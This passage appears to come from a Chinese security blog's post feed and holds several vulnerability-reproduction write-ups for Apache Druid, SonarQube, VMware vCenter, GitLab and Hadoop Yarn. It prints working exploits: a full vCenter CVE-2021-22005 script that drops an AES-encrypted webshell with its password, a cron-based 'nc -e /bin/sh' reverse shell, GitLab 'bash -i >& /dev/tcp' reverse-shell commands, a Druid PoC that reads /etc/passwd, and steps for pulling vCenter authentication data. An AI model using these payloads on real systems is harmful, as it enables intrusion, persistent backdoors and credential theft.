punctuation">}</span>requests<span class="token punctuation">.</span>post<span class="token punctuation">(</span>url<span class="token punctuation">,</span> json<span class="token operator">=</span>data<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><ol><li>利用<code>new-application</code>接口获取<code>application-id</code></li></ol><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120234925491.png" alt="获取application-id"></p><ol start="2"><li>向<code>apps</code>接口POST相关反弹shell命令</li></ol><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120235113722.png" alt="反弹shell"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211120235213233.png" alt="成功"></p><p>修复方案:</p><ul><li>1、Apache Hadoop官方建议用户开启Kerberos认证。</li><li>2、利用安全组功能,设置 Hadoop RPC服务所在端口仅对可信地址开放。</li></ul>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Hadoop Yarn RPC </tag>
</tags>
</entry>
<entry>
<title>Apache Druid LoadData 任意文件读取漏洞 CVE-2021-36749</title>
<link href="/article/378ff17d.html"/>
<url>/article/378ff17d.html</url>
<content type="html"><![CDATA[<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。</p><h2 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>漏洞影响</h2><ul><li>Apache Druid</li></ul><h2 id="FOFA"><a href="#FOFA" class="headerlink" title="FOFA"></a>FOFA</h2><ul><li>title=”Apache Druid” </li></ul><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110191921831.png" alt="index页面"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110192302719.png" alt="文件读取"></p><p>POC:</p><pre class="line-numbers language-none"><code class="language-none">POST /druid/indexer/v1/sampler?for=connect HTTP/1.1Host: Content-Length: 423Accept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36Content-Type: application/json;charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Connection: close{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> requeststarget_url <span class="token operator">=</span> <span class="token builtin">str</span><span class="token punctuation">(</span><span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"\033[35mPlease input Attack Url\nUrl >>> \033[0m"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>url <span class="token operator">=</span> target_url<span class="token operator">+</span><span class="token string">"/druid/indexer/v1/sampler?for=connect"</span>payload <span class="token operator">=</span> <span class="token string">"{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"inputSource\":{\"type\":\"http\",\"uris\":[\"file:///etc/passwd\"]},\"inputFormat\":{\"type\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"raw\"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"timestampSpec\":{\"column\":\"!!!_no_such_column_!!!\",\"missingValue\":\"1970-01-01T00:00:00Z\"},\"dimensionsSpec\":{}},\"tuningConfig\":{\"type\":\"index\"}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"</span>headers <span class="token operator">=</span> <span class="token punctuation">{</span> <span class="token string">'proxy-authorization'</span><span class="token punctuation">:</span> <span class="token string">'Basic Og=='</span><span class="token punctuation">,</span> <span class="token string">'accept'</span><span class="token punctuation">:</span> <span class="token string">'application/json, text/plain, */*'</span><span class="token punctuation">,</span> <span class="token string">'user-agent'</span><span class="token punctuation">:</span> <span class="token string">'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36'</span><span class="token punctuation">,</span> <span class="token string">'content-type'</span><span class="token punctuation">:</span> <span class="token string">'application/json;charset=UTF-8'</span><span class="token punctuation">,</span> <span class="token string">'accept-encoding'</span><span class="token punctuation">:</span> <span class="token string">'gzip, deflate'</span><span class="token punctuation">,</span> <span class="token string">'accept-language'</span><span class="token punctuation">:</span> <span class="token string">'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6'</span><span class="token punctuation">,</span> <span class="token string">'connection'</span><span class="token punctuation">:</span> <span class="token string">'close'</span><span class="token punctuation">,</span> <span class="token string">'proxy-connection'</span><span class="token punctuation">:</span> <span class="token string">'keep-alive'</span><span class="token punctuation">,</span> <span class="token string">'content-length'</span><span class="token punctuation">:</span> <span class="token string">'423'</span><span class="token punctuation">}</span>response <span class="token operator">=</span> requests<span class="token punctuation">.</span>request<span class="token punctuation">(</span><span class="token string">"POST"</span><span class="token punctuation">,</span> url<span class="token punctuation">,</span> headers<span class="token operator">=</span>headers<span class="token punctuation">,</span> data<span class="token operator">=</span>payload<span class="token punctuation">)</span><span class="token keyword">print</span><span class="token punctuation">(</span>response<span class="token punctuation">.</span>text<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p> 不要带:/</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110204420895.png" alt="EXP"></p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> Apache Druid </tag>
</tags>
</entry>
<entry>
<title>SonarQube values 信息泄露漏洞 CVE-2020-27986</title>
<link href="/article/476b0c12.html"/>
<url>/article/476b0c12.html</url>
<content type="html"><![CDATA[<h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息</p><h2 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>漏洞影响</h2><ul><li>SonarQube</li></ul><h2 id="FOFA"><a href="#FOFA" class="headerlink" title="FOFA"></a>FOFA</h2><ul><li>app=”sonarQube-代码管理”</li></ul><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110163540630.png" alt="index页面"></p><p><strong>漏洞POC</strong></p><pre class="line-numbers language-none"><code class="language-none">http://xxx.xxx.xxx.xxx/api/settings/values<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><p>可泄露的为:明文SMTP、SVN和Gitlab等敏感信息</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110164050129.png" alt="Json"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110165044506.png" alt="ces"></p><hr><p><strong>SonarQube search_projects 项目信息泄露漏洞</strong></p><ul><li>app=”sonarQube-代码管理”</li></ul><p>POC:验证</p><p><code>http://xxx.xxx.xxx.xxx/api/components/search_projects</code></p><p>可通过工具下载项目中的源代码 </p><p><a href="https://github.com/deletescape/sloot">https://github.com/deletescape/sloot</a></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211110175116606.png" alt="image-20211110175116606"></p><p><strong>Help</strong></p><pre class="line-numbers language-none"><code class="language-none">Usage of ./sloot: -alsologtostderr log to standard error as well as files -color colorize the console output (default true) -log_backtrace_at value when logging hits line file:N, emit a stack trace -log_dir string If non-empty, write log files in this directory -logtostderr log to standard error instead of files -n Doesn't download discovered projects, and only prints info about them -q Don't print non-fatal errors -s string Path to a Shodan download file with hosts to run against -stderrthreshold value logs at or above this threshold go to stderr -v value log level for V logs -verbose Print every file being downloaded -vmodule value comma-separated list of pattern=N settings for file-filtered logging<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> SonarQube </tag>
</tags>
</entry>
<entry>
<title>会议Everything渗透技巧</title>
<link href="/article/a4dc6685.html"/>
<url>/article/a4dc6685.html</url>
<content type="html"><![CDATA[<h3 id="前言:"><a href="#前言:" class="headerlink" title="前言:"></a>前言:</h3><p>很早以前就有很多apt组织利用everything来进行文件查找等,而且还是个白进程,支持命令行。</p><p>“Everything”是一个运行于Windows系统,基于文件、文件夹名称的快速搜索引擎。</p><p>“Everything”在搜索之前就会把所用的文件和文件夹都列出来,这一点与Windows自带的搜索系统不一样,所以我们称之为“Everything”。</p><p>在搜索框输入文字,它就会只显示过滤后的文件和目录。</p><h3 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>测试环境</h3><p>靶机Windows2019:121.4.67.xxx</p><h3 id="Everything配置"><a href="#Everything配置" class="headerlink" title="Everything配置"></a>Everything配置</h3><p>1、下载便携版 64 位: <a href="https://www.voidtools.com/Everything-1.4.1.1009.x64.zip">https://www.voidtools.com/Everything-1.4.1.1009.x64.zip</a></p><p>命令行安装方法:</p><pre class="line-numbers language-none"><code class="language-none">-install-client-service 安装客户服务-start-client-service 启动服务<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre><p>2、安装everything进行如下配置</p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211101145006193.png" alt="取消显示托盘图标"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211101145457240.png" alt="开启HTTP服务"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211101145551917.png" alt="image-20211101145551917"></p>]]></content>
<categories>
<category> 渗透测试技巧 </category>
</categories>
<tags>
<tag> Everything </tag>
</tags>
</entry>
<entry>
<title>寻码小技巧</title>
<link href="/article/36071c83.html"/>
<url>/article/36071c83.html</url>
<content type="html"><![CDATA[<h2 id="寻码技术"><a href="#寻码技术" class="headerlink" title="寻码技术"></a>寻码技术</h2><p><strong>现在很多文章都有很强的求生欲,在发漏洞时会打上马赛克。看到别人发的漏洞,但是自己没见过的系统就不爽了</strong></p><h3 id="寻某运维平台漏洞挖掘-从后台RCE到前台RCE-文章案例"><a href="#寻某运维平台漏洞挖掘-从后台RCE到前台RCE-文章案例" class="headerlink" title="寻某运维平台漏洞挖掘-从后台RCE到前台RCE 文章案例"></a>寻某运维平台漏洞挖掘-从后台RCE到前台RCE 文章案例</h3><p>使用body=””</p>]]></content>
<categories>
<category> 情报分析 </category>
</categories>
<tags>
<tag> 寻码技巧 </tag>
</tags>
</entry>
<entry>
<title>VMware vCenter Server 任意文件上传漏洞(CVE-2021-22005)</title>
<link href="/article/f90bdb74.html"/>
<url>/article/f90bdb74.html</url>
<content type="html"><![CDATA[<h3 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h3><p>VMware是一家云基础架构和移动商务解决方案厂商,提供基于VMware的虚拟化解决方案。2021年9月22日,VMware 官方发布安全公告,披露了包括 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞在内的<strong>多个中高危严重漏洞</strong>。在CVE-2021-22005中,攻击者可构造恶意请求,通过vCenter中的Analytics服务,可上传恶意文件,从而造成远程代码执行漏洞。</p><h3 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>漏洞影响</h3><pre class="line-numbers language-none"><code class="language-none">针对 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞VMware vCenter Server 7.0系列 < 7.0 U2cVMware vCenter Server 6.7系列 < 6.7 U3oVMware vCenter Server 6.5系列 不受该漏洞影响其余漏洞受影响版本可参考 https://www.vmware.com/security/advisories/VMSA-2021-0020.html安全版本:VMware vCenter Server 7.0 U2cVMware vCenter Server 6.7 U3o<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><p><strong><a href="https://blog.csdn.net/Rio520/article/details/115664112">vcenter server7.0安装</a></strong></p><p><a href="https://pan.baidu.com/s/1oW3JQWIeJoYcnbbJn8PBjw">VMware-VCSA-all-7.0.0-15952498.iso链接</a> 提取码:x6fa </p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><h4 id="漏洞批量检测poc"><a href="#漏洞批量检测poc" class="headerlink" title="漏洞批量检测poc"></a>漏洞批量检测poc</h4><p>我们可以针对 /analytics/telemetry/ph/api/level 端点执行更相关的 cURL 请求来识别你的服务器是否受影响</p><p><code>curl -k -v "https://$VCENTER_HOST/analytics/telemetry/ph/api/level?_c=test"</code></p><ul><li><p>如果服务器以 200/OK 和响应正文中除“OFF”以外的任何内容(例如“FULL”)进行响应,则它很容易受到攻击。 </p></li><li><p>如果它以 200/OK 和“OFF”的正文内容响应,则它很可能不易受到攻击,并且也未修补且未应用任何变通方法。</p></li><li><p>如果它以 400/Bad Request 响应,则对其进行修补。此检查利用以下事实:修补的实例将根据已知/接受的收集器 ID 列表检查收集器 ID (_c)。</p></li><li><p>如果它以 404 响应,则它要么不适用,要么已应用解决方法。该解决方法会禁用受影响的 API 端点。<br>任何其他状态代码可能暗示不适用。</p></li></ul><h4 id="漏洞EXP:"><a href="#漏洞EXP:" class="headerlink" title="漏洞EXP:"></a>漏洞EXP:</h4><p><code>python3 CVE-2021-22005_poc.py -t https://ip</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030232148998.png" alt="利用方法"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030232322304.png" alt="验证0"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030232245833.png" alt="验证"></p><pre class="line-numbers language-python3" data-language="python3"><code class="language-python3">import requestsimport randomimport stringimport sysimport timeimport requestsimport urllib3import argparseurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def id_generator(size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) def escape(_str): _str = _str.replace("&", "&") _str = _str.replace("<", "<") _str = _str.replace(">", ">") _str = _str.replace("\"", """) return _str def str_to_escaped_unicode(arg_str): escaped_str = '' for s in arg_str: val = ord(s) esc_uni = "\\u{:04x}".format(val) escaped_str += esc_uni return escaped_str def createAgent(target, agent_name, log_param): url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param) headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close" } json_data = { "manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True, "deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7", "localPayloadPath": "a8", "localObfuscationMapPath": "a9" } requests.post(url, headers=headers, json=json_data, verify=False) def generate_manifest(webshell_location, webshell): manifestData = """<manifest recommendedPageSize="500"> <request> <query name="vir:VCenter"> <constraint> <targetType>ServiceInstance</targetType> </constraint> <propertySpec> <propertyNames>content.about.instanceUuid</propertyNames> <propertyNames>content.about.osType</propertyNames> <propertyNames>content.about.build</propertyNames> <propertyNames>content.about.version</propertyNames> </propertySpec> </query> </request> <cdfMapping> <indepedentResultsMapping> <resultSetMappings> <entry> <key>vir:VCenter</key> <value> <value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> <resourceItemToJsonLdMapping> <forType>ServiceInstance</forType> <mappingCode><![CDATA[ #set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))## #set($orig_log = $appender.getFile())## #set($logger = $GLOBAL-logger.logger.parent)## $appender.setFile("%s")## $appender.activateOptions()## $logger.warn("%s")## $appender.setFile($orig_log)## $appender.activateOptions()##]]> </mappingCode> </resourceItemToJsonLdMapping> </value> </value> </entry> </resultSetMappings> </indepedentResultsMapping> </cdfMapping> <requestSchedules> <schedule interval="1h"> <queries> <query>vir:VCenter</query> </queries> </schedule> </requestSchedules> </manifest>""" % (webshell_location, webshell) return manifestData def arg(): parser = argparse.ArgumentParser() parser.add_argument("-t", "--target", help = "Target", required = True) args = parser.parse_args() target = args.target print("[*] Target: %s" % target) return target def exec(): target = arg() # Variables webshell_param = id_generator(6) log_param = id_generator(6) agent_name = id_generator(6) shell_name = "Server.jsp" webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>""" webshell_location = "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name webshell = str_to_escaped_unicode(webshell) manifestData = generate_manifest(webshell_location,webshell) print("[*] Creating Agent") createAgent(target, agent_name, log_param) url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param) headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} requests.post(url, headers=headers, json=json_data, verify=False) #webshell连接地址 url = "%s/idm/..;/%s" % (target, shell_name) code = requests.get(url=url, headers=headers,verify=False).status_code if code != "404": print("webshell地址: %s" % url) print("[*]冰蝎3.0 Webshell连接密码: rebeyond" ) else: print("未获取到webshell地址") if __name__ == '__main__': exec()<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><h4 id="反弹shell-EXP"><a href="#反弹shell-EXP" class="headerlink" title="反弹shell EXP"></a>反弹shell EXP</h4><p><code>curl -kv "https:/xx.xx.xx.xx/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh Your IP port"</code></p><p>这里我没成功</p><h4 id="vCenter-cookie读取登录"><a href="#vCenter-cookie读取登录" class="headerlink" title="vCenter cookie读取登录"></a>vCenter cookie读取登录</h4><p>存储关键身份验证信息数据位置:</p><ul><li><p>Linux:</p><pre class="line-numbers language-none"><code class="language-none">/storage/db/vmware-vmdir/data.mdb<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li><li><p>Windows</p><pre class="line-numbers language-none"><code class="language-none">C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre></li></ul><p><strong>读cookie</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211030235010951.png" alt="Linux下数据库目录"></p><p><strong>下载解密脚本:</strong><code>git clone https://github.com/horizon3ai/vcenter_saml_login.git</code></p><p><strong>用法:</strong></p><pre class="line-numbers language-none"><code class="language-none">python3 vcenter_saml_login.py -p data.mdb -t 10.1.2.174<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre><pre class="line-numbers language-none"><code class="language-none">如果提示库文件缺少使用下面方法解决:ModuleNotFoundError: No module named 'OpenSSL'解决方法pip3 install pyOpenSSLModuleNotFoundError: No module named 'ldap'解决方法pip3 install python-ldapModuleNotFoundError: No module named 'signxml' 解决方法pip3 install signxml<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211031004758724.png" alt="解密mdb"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/QQ20211031-013719-HD.gif" alt="QQ20211031-013719-HD"></p><h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h3><p>1、升级VMware vCenter Server 至最新版本。</p><p>2、针对 CVE-2021-22005 VMware vCenter Server 任意文件上传漏洞,可按照 <a href="https://kb.vmware.com/s/article/85717">https://kb.vmware.com/s/article/85717</a> 相关措施进行缓解。</p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> VMware vCenter </tag>
</tags>
</entry>
<entry>
<title>CVE-2021-22205 GitLab 未授权RCE</title>
<link href="/article/659abcc5.html"/>
<url>/article/659abcc5.html</url>
<content type="html"><![CDATA[<h2 id="CVE-2021-22205-GitLab-未授权RCE"><a href="#CVE-2021-22205-GitLab-未授权RCE" class="headerlink" title="CVE-2021-22205 GitLab 未授权RCE"></a>CVE-2021-22205 GitLab 未授权RCE</h2><h3 id="漏洞简介:"><a href="#漏洞简介:" class="headerlink" title="漏洞简介:"></a>漏洞简介:</h3><p>GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。</p><p>GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞<a href="https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html">CVE-2021-22204</a>的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执</p><p>参考链接:</p><ul><li><a href="https://hackerone.com/reports/1154542">https://hackerone.com/reports/1154542</a></li><li><a href="https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html">https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html</a></li><li><a href="https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/">https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/</a></li><li><a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml">https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml</a></li><li><a href="https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/README.zh-cn.md">https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/README.zh-cn.md</a></li></ul><h3 id="影响版本:"><a href="#影响版本:" class="headerlink" title="影响版本:"></a>影响版本:</h3><pre class="line-numbers language-none"><code class="language-none">该漏洞影响以下GitLab企业版和社区版:11.9 <= GitLab(CE/EE)< 13.8.813.9 <= GitLab(CE/EE)< 13.9.613.10 <=GitLab(CE/EE)< 13.10.3本文复现版本:Gitlab CE 13.10.1<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre><h3 id="漏洞环境"><a href="#漏洞环境" class="headerlink" title="漏洞环境"></a>漏洞环境</h3><p>建议内存>8</p><p>执行如下命令启动一个GitLab 13.10.1版本服务器:</p><pre class="line-numbers language-none"><code class="language-none">git clone https://github.com/vulhub/vulhub.gitcd vulhub/gitlab/CVE-2021-22205/docker-compose up -d环境启动后,访问http://your-ip:8080即可查看到GitLab的登录页面。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029214111000.png" alt="GitLab首页"></p><h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><h4 id="漏洞POC"><a href="#漏洞POC" class="headerlink" title="漏洞POC"></a>漏洞POC</h4><p><code>https://github.com/inspiringz/CVE-2021-22205/</code></p><p><code>https://github.com/Al1ex/CVE-2021-22205</code></p><h4 id="漏洞验证"><a href="#漏洞验证" class="headerlink" title="漏洞验证"></a>漏洞验证</h4><p><code>python CVE-2021-22205.py -v true -t http://Your IP:Port</code></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029214708935.png" alt="漏洞探测"></p><p><strong>命令执行:</strong></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029215055570.png" alt="dnslog验证"></p><p><strong>反弹shell:</strong></p><pre class="line-numbers language-none"><code class="language-none">python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"这条语句意思是代表,将反弹shell命令写成sh脚本 到tmp目录下python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "chmod +x /tmp/1.sh"这条语句意思是代表,对写入成功的sh脚本加执行权限python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "/bin/bash /tmp/1.sh"这条语句意思是代表,运行反弹shell脚本<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029215631594.png" alt="反弹shell写入1.sh脚本"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220042720.png" alt="写入成功验证"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220215319.png" alt="修改脚本权限"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220251930.png" alt="验证修改权限成功"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220538808.png" alt="反弹shell"></p><p><img src="https://imges-1255470970.cos.ap-nanjing.myqcloud.com/img/image-20211029220605182.png" alt="大部分权限都是git这里需要提权"></p><h3 id="修复方案"><a href="#修复方案" class="headerlink" title="修复方案"></a>修复方案</h3><p>1、及时升级GitLab至最新安全版本</p><p>2、配置访问控制策略,避免受影响的GitLab暴露在公</p>]]></content>
<categories>
<category> 漏洞复现 </category>
</categories>
<tags>
<tag> GitLab </tag>
</tags>
</entry>
<entry>
<title>国外扫描工具-Nuclei</title>
<link href="/article/da8eafa9.html"/>
<url>/article/da8eafa9.html</url>
